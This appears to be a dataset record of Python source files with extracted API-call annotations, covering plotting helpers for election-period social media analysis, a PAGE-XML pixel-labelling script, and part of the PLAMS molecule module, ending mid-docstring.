[ "numpy.absolute", "math.sqrt", "scipy.signal.convolve2d", "numpy.zeros", "numpy.mean", "numpy.exp" ]
[((663, 679), 'numpy.zeros', 'np.zeros', (['(8, 8)'], {}), '((8, 8))\n', (671, 679), True, 'import numpy as np\n'), ((2311, 2365), 'scipy.signal.convolve2d', 'scipy.signal.convolve2d', (['img_roi', 'filter1'], {'mode': '"""same"""'}), "(img_roi, filter1, mode='same')\n", (2334, 2365), False, 'import scipy\n'), ((2382, 2436), 'scipy.signal.convolve2d', 'scipy.signal.convolve2d', (['img_roi', 'filter2'], {'mode': '"""same"""'}), "(img_roi, filter2, mode='same')\n", (2405, 2436), False, 'import scipy\n'), ((369, 395), 'math.sqrt', 'math.sqrt', (['(x ** 2 + y ** 2)'], {}), '(x ** 2 + y ** 2)\n', (378, 395), False, 'import math\n'), ((504, 556), 'numpy.exp', 'np.exp', (['(-0.5 * (x ** 2 / dx ** 2 + y ** 2 / dy ** 2))'], {}), '(-0.5 * (x ** 2 / dx ** 2 + y ** 2 / dy ** 2))\n', (510, 556), True, 'import numpy as np\n'), ((1373, 1391), 'numpy.absolute', 'np.absolute', (['grid1'], {}), '(grid1)\n', (1384, 1391), True, 'import numpy as np\n'), ((1438, 1455), 'numpy.mean', 'np.mean', (['absolute'], {}), '(absolute)\n', (1445, 1455), True, 'import numpy as np\n'), ((1678, 1696), 'numpy.absolute', 'np.absolute', (['grid2'], {}), '(grid2)\n', (1689, 1696), True, 'import numpy as np\n'), ((1743, 1760), 'numpy.mean', 'np.mean', (['absolute'], {}), '(absolute)\n', (1750, 1760), True, 'import numpy as np\n'), ((1554, 1582), 'numpy.absolute', 'np.absolute', (['(absolute - mean)'], {}), '(absolute - mean)\n', (1565, 1582), True, 'import numpy as np\n'), ((1859, 1887), 'numpy.absolute', 'np.absolute', (['(absolute - mean)'], {}), '(absolute - mean)\n', (1870, 1887), True, 'import numpy as np\n')]
#export import matplotlib import matplotlib.pyplot as plt from datetime import datetime import glob import emoji import numpy as np import seaborn as sns def convert(year,month,date): return int(datetime(year, month, date, 0, 0, 0).timestamp()*1000) def convert_reverse(timestamp): dt_object = datetime.fromtimestamp(timestamp/1000) print("dt_object =", dt_object) return dt_object def add_extra_timeperiod(plt,window,start_time,end_time): start_election = convert(2019,4,11) end_election = convert(2019,5,23) pulwama_event= convert(2019,2,14) balakot_event= convert(2019,2,27) day_start=int((start_election-start_time)/(window*24*60*60*1000)) day_end=int((end_election-start_time)/(window*24*60*60*1000)) plt.axvline(day_start, linestyle='--', color='r') for i in range(day_start+1,day_end): plt.axvline(i, linestyle='--',alpha=0.2, color='r') plt.axvline(day_end, linestyle='--', color='r') day_pulwama=int((pulwama_event-start_time)/(window*24*60*60*1000)) day_balakot=int((balakot_event-start_time)/(window*24*60*60*1000)) plt.axvline(day_pulwama, linestyle='--',alpha=0.5, color='k',linewidth=1.5) plt.axvline(day_balakot, linestyle='--',alpha=0.5, color='k',linewidth=1.5) x_tick_keys=[] x_tick_label=[] for year in [2018,2019]: for month in range(1,13): if(year==2019 and (month in [3,4,6])): continue timestamp_begin_month=convert(year,month,1) if(timestamp_begin_month>start_time and timestamp_begin_month<end_time): first_day_month =int((timestamp_begin_month-start_time)/(window*24*60*60*1000)) x_tick_keys.append(first_day_month) x_tick_label.append(str(month)+'/'+str(year)) #### for pulwama +balakot x_tick_keys.append(day_pulwama) x_tick_label.append('pulwama event') x_tick_keys.append(day_balakot) x_tick_label.append('balakot event') x_tick_keys.append(day_start) x_tick_label.append('election start') x_tick_keys.append(day_end) x_tick_label.append('election end') plt.xticks(x_tick_keys, x_tick_label, rotation=90) return plt def emoji_string(ele): emoji_files=glob.glob("../Political_Results/Emoji/*") try: emoji_name="-".join(emoji.demojize(ele)[1:-1].split('_')) except: return " " str1= " " for emoji_file in emoji_files: temp=emoji_file.split("/")[3] emoji_filename = temp.split("_")[0] if(emoji_filename==emoji_name): return "\includegraphics[height=1em]{samples/Emoji/"+temp+"}" print(emoji_name+" not found") return str1 def latex_emoji_communities(community_dict): str1="\\begin{table}[!htb]\n\\begin{tabular}{c}\n \hline Emojis \\\\\hline" for key in community_dict: for ele in community_dict[key]: str1+=emoji_string(ele)+"," str1+="\\\\\\hline\n" str1+="\end{tabular}\n\caption{Co-occuring emojis captured as communities}\n \label{tab:emoji_communities}\n\end{table}" return str1 def make_confusion_matrix(cf, group_names=None, categories='auto', count=True, percent=True, cbar=True, xyticks=True, xyplotlabels=True, sum_stats=True, figsize=None, cmap='Blues', title=None): ''' This function will make a pretty plot of an sklearn Confusion Matrix cm using a Seaborn heatmap visualization. Arguments --------- cf: confusion matrix to be passed in group_names: List of strings that represent the labels row by row to be shown in each square. categories: List of strings containing the categories to be displayed on the x,y axis. Default is 'auto' count: If True, show the raw number in the confusion matrix. Default is True. normalize: If True, show the proportions for each category. Default is True. cbar: If True, show the color bar. The cbar values are based off the values in the confusion matrix. Default is True. xyticks: If True, show x and y ticks. Default is True. xyplotlabels: If True, show 'True Label' and 'Predicted Label' on the figure. Default is True. sum_stats: If True, display summary statistics below the figure. Default is True. figsize: Tuple representing the figure size. Default will be the matplotlib rcParams value. cmap: Colormap of the values displayed from matplotlib.pyplot.cm. Default is 'Blues' See http://matplotlib.org/examples/color/colormaps_reference.html title: Title for the heatmap. Default is None. ''' # CODE TO GENERATE TEXT INSIDE EACH SQUARE blanks = ['' for i in range(cf.size)] if group_names and len(group_names)==cf.size: group_labels = ["{}\n".format(value) for value in group_names] else: group_labels = blanks if count: group_counts = ["{0:0.0f}\n".format(value) for value in cf.flatten()] else: group_counts = blanks if percent: group_percentages = ["{0:.2%}".format(value) for value in cf.flatten()/np.sum(cf)] else: group_percentages = blanks box_labels = [f"{v1}{v2}{v3}".strip() for v1, v2, v3 in zip(group_labels,group_counts,group_percentages)] box_labels = np.asarray(box_labels).reshape(cf.shape[0],cf.shape[1]) # CODE TO GENERATE SUMMARY STATISTICS & TEXT FOR SUMMARY STATS if sum_stats: #Accuracy is sum of diagonal divided by total observations accuracy = np.trace(cf) / float(np.sum(cf)) #if it is a binary confusion matrix, show some more stats if len(cf)==2: #Metrics for Binary Confusion Matrices precision = cf[1,1] / sum(cf[:,1]) recall = cf[1,1] / sum(cf[1,:]) f1_score = 2*precision*recall / (precision + recall) stats_text = "\n\nAccuracy={:0.3f}\nPrecision={:0.3f}\nRecall={:0.3f}\nF1 Score={:0.3f}".format( accuracy,precision,recall,f1_score) else: stats_text = "\n\nAccuracy={:0.3f}".format(accuracy) else: stats_text = "" # SET FIGURE PARAMETERS ACCORDING TO OTHER ARGUMENTS if figsize==None: #Get default figure size if not set figsize = plt.rcParams.get('figure.figsize') if xyticks==False: #Do not show categories if xyticks is False categories=False # MAKE THE HEATMAP VISUALIZATION plt.figure(figsize=figsize) sns.heatmap(cf,annot=box_labels,fmt="",cmap=cmap,cbar=cbar,xticklabels=categories,yticklabels=categories) if xyplotlabels: plt.ylabel('True label') plt.xlabel('Predicted label' + stats_text) else: plt.xlabel(stats_text) if title: plt.title(title)
[ "matplotlib.pyplot.title", "matplotlib.pyplot.axvline", "numpy.trace", "seaborn.heatmap", "numpy.sum", "emoji.demojize", "datetime.datetime.fromtimestamp", "numpy.asarray", "matplotlib.pyplot.rcParams.get", "datetime.datetime", "matplotlib.pyplot.figure", "glob.glob", "matplotlib.pyplot.ylabel", "matplotlib.pyplot.xticks", "matplotlib.pyplot.xlabel" ]
[((305, 345), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['(timestamp / 1000)'], {}), '(timestamp / 1000)\n', (327, 345), False, 'from datetime import datetime\n'), ((762, 811), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_start'], {'linestyle': '"""--"""', 'color': '"""r"""'}), "(day_start, linestyle='--', color='r')\n", (773, 811), True, 'import matplotlib.pyplot as plt\n'), ((917, 964), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_end'], {'linestyle': '"""--"""', 'color': '"""r"""'}), "(day_end, linestyle='--', color='r')\n", (928, 964), True, 'import matplotlib.pyplot as plt\n'), ((1113, 1190), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_pulwama'], {'linestyle': '"""--"""', 'alpha': '(0.5)', 'color': '"""k"""', 'linewidth': '(1.5)'}), "(day_pulwama, linestyle='--', alpha=0.5, color='k', linewidth=1.5)\n", (1124, 1190), True, 'import matplotlib.pyplot as plt\n'), ((1193, 1270), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_balakot'], {'linestyle': '"""--"""', 'alpha': '(0.5)', 'color': '"""k"""', 'linewidth': '(1.5)'}), "(day_balakot, linestyle='--', alpha=0.5, color='k', linewidth=1.5)\n", (1204, 1270), True, 'import matplotlib.pyplot as plt\n'), ((2143, 2193), 'matplotlib.pyplot.xticks', 'plt.xticks', (['x_tick_keys', 'x_tick_label'], {'rotation': '(90)'}), '(x_tick_keys, x_tick_label, rotation=90)\n', (2153, 2193), True, 'import matplotlib.pyplot as plt\n'), ((2252, 2293), 'glob.glob', 'glob.glob', (['"""../Political_Results/Emoji/*"""'], {}), "('../Political_Results/Emoji/*')\n", (2261, 2293), False, 'import glob\n'), ((6804, 6831), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (6814, 6831), True, 'import matplotlib.pyplot as plt\n'), ((6836, 6952), 'seaborn.heatmap', 'sns.heatmap', (['cf'], {'annot': 'box_labels', 'fmt': '""""""', 'cmap': 'cmap', 'cbar': 'cbar', 'xticklabels': 'categories', 'yticklabels': 'categories'}), "(cf, annot=box_labels, fmt='', cmap=cmap, cbar=cbar, xticklabels\n =categories, yticklabels=categories)\n", (6847, 6952), True, 'import seaborn as sns\n'), ((861, 913), 'matplotlib.pyplot.axvline', 'plt.axvline', (['i'], {'linestyle': '"""--"""', 'alpha': '(0.2)', 'color': '"""r"""'}), "(i, linestyle='--', alpha=0.2, color='r')\n", (872, 913), True, 'import matplotlib.pyplot as plt\n'), ((6625, 6659), 'matplotlib.pyplot.rcParams.get', 'plt.rcParams.get', (['"""figure.figsize"""'], {}), "('figure.figsize')\n", (6641, 6659), True, 'import matplotlib.pyplot as plt\n'), ((6972, 6996), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""True label"""'], {}), "('True label')\n", (6982, 6996), True, 'import matplotlib.pyplot as plt\n'), ((7005, 7047), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (["('Predicted label' + stats_text)"], {}), "('Predicted label' + stats_text)\n", (7015, 7047), True, 'import matplotlib.pyplot as plt\n'), ((7066, 7088), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['stats_text'], {}), '(stats_text)\n', (7076, 7088), True, 'import matplotlib.pyplot as plt\n'), ((7116, 7132), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (7125, 7132), True, 'import matplotlib.pyplot as plt\n'), ((5644, 5666), 'numpy.asarray', 'np.asarray', (['box_labels'], {}), '(box_labels)\n', (5654, 5666), True, 'import numpy as np\n'), ((5874, 5886), 'numpy.trace', 'np.trace', (['cf'], {}), '(cf)\n', (5882, 5886), True, 'import numpy as np\n'), ((5895, 5905), 'numpy.sum', 'np.sum', (['cf'], {}), '(cf)\n', (5901, 5905), True, 'import numpy as np\n'), ((201, 237), 'datetime.datetime', 'datetime', (['year', 'month', 'date', '(0)', '(0)', '(0)'], {}), '(year, month, date, 0, 0, 0)\n', (209, 237), False, 'from datetime import datetime\n'), ((5459, 5469), 'numpy.sum', 'np.sum', (['cf'], {}), '(cf)\n', (5465, 5469), True, 'import numpy as np\n'), ((2331, 2350), 'emoji.demojize', 'emoji.demojize', (['ele'], {}), '(ele)\n', (2345, 2350), False, 'import emoji\n')]
import os import cv2 import numpy as np import lxml.etree as ET page_folder='moc_dataset/train/moc_train_xml/' image_folder='moc_dataset/train/moc_train_images/' pixel_label_folder='moc_dataset/train/moc_train_pixel_label/' os.mkdir(pixel_label_folder) for page_file in sorted(os.listdir(page_folder)): print(page_file) img=cv2.imread(image_folder+page_file[:-4]+'.png',0) img=255-img tree=ET.parse(page_folder+page_file) root=tree.getroot() page=root[1] width=int(page.attrib.get('imageWidth')) height=int(page.attrib.get('imageHeight')) pixel_label_img=np.zeros((height,width)) pixel_label=5 text_region=page[1] number_of_textlines=(len(text_region)) for i in range(1,number_of_textlines-1): textline=text_region[i] points=textline[0].attrib.get('points').split(" ") number_of_vertices=len(points) vertices_list=[] for j in range(number_of_vertices): x=int(points[j].split(",")[0]) y=int(points[j].split(",")[1]) vertices_list.append([x,y]) vertices_array=np.array([vertices_list],dtype=np.int32) line_mask=np.zeros((height,width)) line_mask=cv2.fillPoly(line_mask,vertices_array,1) line_text=img*line_mask pixel_label_img[line_text==255]=pixel_label pixel_label=pixel_label+1 cv2.imwrite(pixel_label_folder+page_file[:-4]+'.png',pixel_label_img)
[ "os.mkdir", "cv2.imwrite", "numpy.zeros", "cv2.fillPoly", "cv2.imread", "numpy.array", "lxml.etree.parse", "os.listdir" ]
[((225, 253), 'os.mkdir', 'os.mkdir', (['pixel_label_folder'], {}), '(pixel_label_folder)\n', (233, 253), False, 'import os\n'), ((279, 302), 'os.listdir', 'os.listdir', (['page_folder'], {}), '(page_folder)\n', (289, 302), False, 'import os\n'), ((334, 387), 'cv2.imread', 'cv2.imread', (["(image_folder + page_file[:-4] + '.png')", '(0)'], {}), "(image_folder + page_file[:-4] + '.png', 0)\n", (344, 387), False, 'import cv2\n'), ((408, 441), 'lxml.etree.parse', 'ET.parse', (['(page_folder + page_file)'], {}), '(page_folder + page_file)\n', (416, 441), True, 'import lxml.etree as ET\n'), ((593, 618), 'numpy.zeros', 'np.zeros', (['(height, width)'], {}), '((height, width))\n', (601, 618), True, 'import numpy as np\n'), ((1361, 1435), 'cv2.imwrite', 'cv2.imwrite', (["(pixel_label_folder + page_file[:-4] + '.png')", 'pixel_label_img'], {}), "(pixel_label_folder + page_file[:-4] + '.png', pixel_label_img)\n", (1372, 1435), False, 'import cv2\n'), ((1096, 1137), 'numpy.array', 'np.array', (['[vertices_list]'], {'dtype': 'np.int32'}), '([vertices_list], dtype=np.int32)\n', (1104, 1137), True, 'import numpy as np\n'), ((1155, 1180), 'numpy.zeros', 'np.zeros', (['(height, width)'], {}), '((height, width))\n', (1163, 1180), True, 'import numpy as np\n'), ((1198, 1240), 'cv2.fillPoly', 'cv2.fillPoly', (['line_mask', 'vertices_array', '(1)'], {}), '(line_mask, vertices_array, 1)\n', (1210, 1240), False, 'import cv2\n')]
from __future__ import unicode_literals import copy import heapq import math import numpy import os import types import uuid from .common import log from .errors import MoleculeError, PTError, FileError from .settings import Settings from ..tools.pdbtools import PDBHandler, PDBRecord from ..tools.utils import Units, PT __all__ = ['Atom', 'Bond', 'Molecule'] #=================================================================================================== #=================================================================================================== #=================================================================================================== class Atom(object): """A class representing a single atom in three dimensional space. An instance of this class has the following attributes: * ``atnum`` -- atomic number (zero for "dummy atoms") * ``coords`` -- tuple of length 3 storing spatial coordinates * ``bonds`` -- list of bonds (see |Bond|) this atom is a part of * ``mol`` -- a |Molecule| this atom belongs to * ``properties`` -- a |Settings| instance storing all other information about this atom (initially it is populated with *\*\*other* keyword arguments passed to the constructor) All the above attributes can be accessed either directly or using one of the following properties: * ``x``, ``y``, ``z`` -- allow to read or modify each coordinate separately * ``symbol`` -- allows to read or write atomic symbol directly. Atomic symbol is not stored as an attribute, instead of that atomic number (``atnum``) indicates the type of atom. In fact, ``symbol`` this is just a wrapper around ``atnum`` that uses |PeriodicTable| as a translator:: >>> a = Atom(atnum=8) >>> print a.symbol O >>> a.symbol = 'Ca' >>> print a.atnum 20 * ``mass`` -- atomic mass, obtained from |PeriodicTable|, read only * ``radius`` -- atomic radius, obtained from |PeriodicTable|, read only * ``connectors`` -- number of connectors, obtained from |PeriodicTable|, read only .. note:: When creating a new atom, its type can be chosen either by setting an atomic number or a symbol (``atnum`` and ``symbol`` constructor arguments). Symbol takes precedence -- if it is supplied, ``atnum`` argument is ignored. Values stored in ``coords`` tuple do not necessarily have to be numeric, you can also store any string there. This might come handy for programs that allow parametrization of coordinates in the input file (to enforce some geometry constraints for example):: >>> a = Atom(symbol='C', coords=(1,2,3)) >>> print a C 1.00000 2.00000 3.00000 >>> a.y = 'param1' >>> print a C 1.00000 param1 3.00000 However, non-numerical coordinates cannot be used together with some methods (for example :meth:`distance_to` or :meth:`translate`). Trying to do this will raise an exception. Internally, atomic coordinates are always expressed in angstroms. Most of methods that read or modify atomic coordinates accept keyword argument ``unit`` allowing to choose unit in which results and/or arguments are expressed (see |Units| for details). Throughout the entire code angstrom is the default length unit. If you don't specify ``unit`` parameter in any place of your script, all automatic unit handling described above boils down to occasional multiplication/division by 1.0. """ def __init__(self, atnum=0, symbol=None, coords=None, unit='angstrom', bonds=None, mol=None, **other): if symbol is not None: self.symbol = symbol else: self.atnum = atnum self.mol = mol self.bonds = bonds or [] self.properties = Settings(other) if coords is None: self.coords = (0.0, 0.0, 0.0) elif len(coords) == 3: tmp = [] for i in coords: try: i = Units.convert(float(i), unit, 'angstrom') except ValueError: pass tmp.append(i) self.coords = tuple(tmp) else: raise TypeError('Atom: Invalid coordinates passed') def str(self, symbol=True, suffix='', unit='angstrom', space=14, decimal=6): """Return a string representation of this atom. Returned string is a single line (no newline characters) that always contains atomic coordinates (and maybe more). Each atomic coordinate is printed using *space* characters, with *decimal* characters reserved for decimal digits. Coordinates values are expressed in *unit*. If *symbol* is ``True``, atomic symbol is added at the beginning of the line. If *symbol* is a string, this exact string is printed there. *suffix* is an arbitrary string that is appended at the end of returned line. It can contain identifiers in curly brackets (like for example ``f={fragment}``) that will be replaced by values of corresponding attributes (in this case ``self.fragment``). It is done via new string formatting and entire ``self.__dict__`` is passed to formating method. See :ref:`new-string-formatting` for details. Example: >>> a = Atom(atnum=6, coords=(1,1.5,2)) >>> print a.str() C 1.000000 1.500000 2.000000 >>> print a.str(unit='bohr') C 1.889726 2.834589 3.779452 >>> print a.str(symbol=False) 1.000000 1.500000 2.000000 >>> print a.str(symbol='C2.13') C2.13 1.000000 1.500000 2.000000 >>> print a.str(suffix='protein1') C 1.000000 1.500000 2.000000 protein1 >>> a.info = 'membrane' >>> print a.str(suffix='subsystem={info}') C 1.000000 1.500000 2.000000 subsystem=membrane """ strformat = '{:>%is}'%space numformat = '{:>%i.%if}'%(space,decimal) f = lambda x: numformat.format(Units.convert(x, 'angstrom', unit)) if isinstance(x, (int,float)) else strformat.format(str(x)) if symbol is False: return ('{0}{1}{2} '+suffix).format(*map(f,self.coords), **self.__dict__) if symbol is True: symbol = self.symbol return ('{0:>10s}{1}{2}{3} '+suffix).format(symbol, *map(f,self.coords), **self.__dict__) def __str__(self): """Return a string representation of this atom. Simplified version of :meth:`str` to work as a magic method.""" return self.str() def __iter__(self): """Iteration through atom yields coordinates. Thanks to that instances of |Atom| can be passed to any method requiring point or vector as an argument.""" return iter(self.coords) def _setx(self, value): self.coords = (value, self.coords[1], self.coords[2]) def _sety(self, value): self.coords = (self.coords[0], value, self.coords[2]) def _setz(self, value): self.coords = (self.coords[0], self.coords[1], value) def _getx(self): return self.coords[0] def _gety(self): return self.coords[1] def _getz(self): return self.coords[2] x = property(_getx, _setx) y = property(_gety, _sety) z = property(_getz, _setz) def _getsymbol(self): return PT.get_symbol(self.atnum) def _setsymbol(self, symbol): self.atnum = PT.get_atomic_number(symbol) symbol = property(_getsymbol, _setsymbol) def _getmass(self): return PT.get_mass(self.atnum) mass = property(_getmass) def _getradius(self): return PT.get_radius(self.atnum) radius = property(_getradius) def _getconnectors(self): return PT.get_connectors(self.atnum) connectors = property(_getconnectors) def translate(self, vector, unit='angstrom'): """Move this atom in space by *vector*, expressed in *unit*. *vector* should be an iterable container of length 3 (usually tuple, list or numpy array). *unit* describes unit of values stored in *vector*. This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise. """ ratio = Units.conversion_ratio(unit, 'angstrom') self.coords = tuple(i + j*ratio for i,j in zip(self, vector)) def move_to(self, point, unit='angstrom'): """Move this atom to a given *point* in space, expressed in *unit*. *point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise. """ ratio = Units.conversion_ratio(unit, 'angstrom') self.coords = tuple(i*ratio for i in point) def distance_to(self, point, unit='angstrom', result_unit='angstrom'): """Measure the distance between this atom and *point*. *point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. Returned value is expressed in *result_unit*. This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise. """ ratio = Units.conversion_ratio(unit, 'angstrom') res = 0.0 for i,j in zip(self,point): res += (i - j*ratio)**2 return Units.convert(math.sqrt(res), 'angstrom', result_unit) def vector_to(self, point, unit='angstrom', result_unit='angstrom'): """Calculate a vector from this atom to *point*. *point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. Returned value is expressed in *result_unit*. This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise. """ ratio = Units.conversion_ratio(unit, 'angstrom') resultratio = Units.conversion_ratio('angstrom', result_unit) return tuple((i*ratio-j)*resultratio for i,j in zip(point, self)) def angle(self, point1, point2, point1unit='angstrom', point2unit='angstrom',result_unit='radian'): """Calculate an angle between vectors pointing from this atom to *point1* and *point2*. *point1* and *point2* should be iterable containers of length 3 (for example: tuple, |Atom|, list, numpy array). Values stored in them are expressed in, respectively, *point1unit* and *point2unit*. Returned value is expressed in *result_unit*. This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise. """ num = numpy.dot(self.vector_to(point1, point1unit), self.vector_to(point2, point2unit)) den = self.distance_to(point1, point1unit) * self.distance_to(point2, point2unit) return Units.convert(math.acos(num/den), 'radian', result_unit) def rotate(self, matrix): """Rotate this atom according to rotation *matrix*. *matrix* should be a container with 9 numerical values. It can be a list (tuple, numpy array etc.) listing matrix elements row-wise, either flat (``[1,2,3,4,5,6,7,8,9]``) or in two-level fashion (``[[1,2,3],[4,5,6],[7,8,9]]``). .. note:: This method does not check if supplied matrix is a proper rotation matrix. """ matrix = numpy.array(matrix).reshape(3,3) self.coords = tuple(numpy.dot(matrix, numpy.array(self.coords))) #=================================================================================================== #=================================================================================================== #=================================================================================================== class Bond (object): """A class representing a bond between two atoms. An instance of this class has the following attributes: * ``atom1`` and ``atom2`` -- two instances of |Atom| that form this bond * ``order`` -- order of the bond. It is either an integer number or the floating point value stored in ``Bond.AR``, indicating aromatic bond * ``mol`` -- a |Molecule| this bond belongs to * ``properties`` -- a |Settings| instance storing all other information about this bond (initially it is populated with *\*\*other* keyword arguments passed to the constructor) .. note:: Newly created bond is **not** added to ``atom1.bonds`` or ``atom2.bonds``. Storing information about |Bond| in |Atom| is relevant only in the context of the whole |Molecule|, so this information is updated by :meth:`~Molecule.add_bond`. """ AR = 1.5 def __init__(self, atom1, atom2, order=1, mol=None, **other): self.atom1 = atom1 self.atom2 = atom2 self.order = order self.mol = mol self.properties = Settings(other) def __str__(self): """Return string representation of this bond.""" return '(%s)--%1.1f--(%s)'%(str(self.atom1), self.order, str(self.atom2)) def __iter__(self): """Iterate over bonded atoms (``atom1`` first, then ``atom2``).""" yield self.atom1 yield self.atom2 def is_aromatic(self): """Check if this bond is aromatic.""" return self.order == Bond.AR def length(self, unit='angstrom'): """Return bond's length, expressed in *unit*.""" return self.atom1.distance_to(self.atom2, result_unit=unit) def other_end(self, atom): """Return the atom on the other end of this bond with respect to *atom*. *atom* has to be either ``atom1`` or ``atom2``, otherwise an exception is raised. """ if atom is self.atom1: return self.atom2 elif atom is self.atom2: return self.atom1 else: raise MoleculeError('Bond.other_end: invalid atom passed') def resize(self, atom, length, unit='angstrom'): """Change the length of the bond to *length*. This method works in the following way: one of two atoms forming this bond is moved along the bond in such a way that new length is *length*, in *unit* (direction of the bond in space does not change). Atom indicated by *atom* has to be one of bond's atoms and it is the atom that is **not** moved. """ ratio = 1.0 - Units.convert(length, unit, 'angstrom')/self.length() moving = self.other_end(atom) moving.translate(tuple(i*ratio for i in moving.vector_to(atom))) #=================================================================================================== #=================================================================================================== #=================================================================================================== class Molecule (object): """A class representing basic molecule object. An instance of this class has the following attributes: * ``atoms`` -- a list of |Atom| objects that belong to this molecule * ``bonds`` -- a list of |Bond| objects between atoms listed in ``atoms`` * ``lattice`` -- a list of lattice vectors, in case of periodic structures * ``properties`` -- a |Settings| instance storing all other information about this molecule .. note:: Each |Atom| in ``atoms`` list and each |Bond| in ``bonds`` list has a reference to the parent molecule. Moreover, each atom stores the list of bonds it's a part of and each bond stores references to atoms it bonds. That creates a complex net of references between objects that are part of a molecule. Consistency of this data is crucial for proper functioning of many methods. Because of that it is advised not to modify contents of ``atoms`` and ``bonds`` by hand. When you need to alter your molecule, methods :meth:`add_atom`, :meth:`delete_atom`, :meth:`add_bond` and :meth:`delete_bond` can be used to ensure that all these references are updated properly. Creating a |Molecule| object for your calculation can be done in two ways. You can start with an empty molecule and manually add all atoms (and bonds, if needed):: >>> mol = Molecule() >>> mol.add_atom(Atom(atnum=1, coords=(0,0,0))) >>> mol.add_atom(Atom(atnum=1, coords=(d,0,0))) This approach can be useful for building small molecules, especially if you wish to parametrize some of atomic coordinates (like in :ref:`simple_example`), but in general it's not very practical. Usually one wants to import atomic coordinates from some external file:: >>> mol = Molecule('xyz/Benzene.xyz') Constructor of a |Molecule| object accepts three arguments that can be used to supply this information from a file in your filesystem. *filename* should be a string with a path (absolute or relative) to such a file. *inputformat* describes the format of the file. Currently, the following formats are supported: ``xyz``, ``mol``, ``mol2`` and ``pdb``. If *inputformat* argument is not supplied, PLAMS will try to deduce it by examining the extension of the provided file, so in most of cases it is not needed to use *inputformat*, if only the file has the proper extension. Some formats (``xyz`` and ``pdb``) allow to store more than one geometry of a particular molecule within a single file. In such cases *geometry* argument can be used to indicate which (in order of appearance in the file) geometry to import. *other* keyword arguments passed to the constructor are used to populate ``properties`` |Settings|. If a |Molecule| is initialized from an external file, the path to this file (*filename* argument) is stored in ``properties.source``. The base name of the file without extension is kept in ``properties.name``. It is also possible to write a molecule to a file in one of the formats mentioned above. See :meth:`write` for details. ``lattice`` attribute is used to store information about lattice vectors in case of periodic structures. Some job types (|BANDJob|, |DFTBJob|) will automatically use that data while constructing input files. ``lattice`` should be a list of up to 3 vectors (for different types of periodicity: chain, slab or bulk), each of which needs to be a list or a tuple of 3 numbers. Lattice vectors can be directly read and written to ``xyz`` files using the following convention (please mind the fact that this is an unofficial extension to the XYZ format):: 3 H 0.000000 0.765440 -0.008360 O 0.000000 0.000000 0.593720 H 0.000000 -0.765440 -0.008360 VEC1 3.000000 0.000000 0.000000 VEC2 0.000000 3.000000 0.000000 VEC3 0.000000 0.000000 3.000000 For 1D (2D) periodicity please supply only ``VEC1`` (``VEC1`` and ``VEC2``). Writing lattice vectors to ``xyz`` files can be disabled by simply reseting the ``lattice`` attribute:: >>> mol.lattice = [] |hspace| Below the detailed description of available methods is presented. Many of these methods require passing atoms belonging to the molecule as arguments. It can by done by using a reference to an |Atom| object present it ``atoms`` list, but not by passing a number of an atom (its position within ``atoms`` list). Unlike some other tools, PLAMS does not use integer numbers as primary identifiers of atoms. It is done to prevent problems when atoms within a molecule are reordered or some atoms are deleted. References to |Atom| or |Bond| objects can be obtained directly from ``atoms`` or ``bonds`` lists, or with dictionary-like bracket notation:: >>> mol = Molecule('xyz/Ammonia.xyz') >>> mol.guess_bonds() >>> print mol Atoms: 1 H 0.942179 0.000000 -0.017370 2 H -0.471089 0.815951 -0.017370 3 N 0.000000 0.000000 0.383210 4 H -0.471089 -0.815951 -0.017370 Bonds: (1)--1.0--(3) (2)--1.0--(3) (3)--1.0--(4) >>> at = mol[1] >>> print at H 0.942179 0.000000 -0.017370 >>> b = mol[(1,3)] >>> print b ( H 0.942179 0.000000 -0.017370 )--1.0--( N 0.000000 0.000000 0.383210 ) >>> b = mol[(1,4)] >>> print b None .. note:: Numbering of atoms within a molecule starts with 1. However, if you feel more familiar with identifying atoms by natural numbers, you can use :meth:`set_atoms_id` to equip each atom of the molecule with ``id`` attribute equal to atom's position within ``atoms`` list. This method can also be helpful to track changes in your molecule during tasks that can reorder atoms. """ def __init__(self, filename=None, inputformat=None, geometry=1, **other): self.atoms = [] self.bonds = [] self.lattice = [] self.properties = Settings(other) if filename is not None : self.read(filename, inputformat, geometry) self.properties.source = filename self.properties.name = os.path.splitext(os.path.basename(filename))[0] #=================================================================================================== #==== Atoms/bonds manipulation ===================================================================== #=================================================================================================== def copy(self, atoms=None): """Return a copy of this molecule. New molecule has atoms, bonds and all other components distinct from original molecule (it is so called "deep copy"). By default the entire molecule is copied. It is also possible to copy only some part of the molecule, indicated by *atoms* argument. It should be a list of atoms that **belong to this molecule**. Only these atoms, together with any bonds between them, are copied and included in the returned molecule. """ if atoms is None: return copy.deepcopy(self) for at in self.atoms: at._stay = False for at in atoms: at._stay = True ret = copy.deepcopy(self) for at in reversed(ret.atoms): if at._stay is False: ret.delete_atom(at) del at._stay for at in self.atoms: del at._stay return ret def add_atom(self, atom, adjacent=None): """Add new *atom* to this molecule. *atom* should be an |Atom| instance that does not belong to the molecule. Bonds between the new atom and other atoms of the molecule can be automatically added based on *adjacent* argument. It should be a list describing atoms of the molecule that the new atom is connected to. Each element of *adjacent* list can either be a pair ``(Atom, order)`` to indicate new bond's order (use ``Bond.AR`` for aromatic bonds) or an |Atom| instance (a single bond is inserted in this case). Example:: >>> mol = Molecule() #create an empty molecule >>> h1 = Atom(symbol='H', coords=(1.0, 0.0, 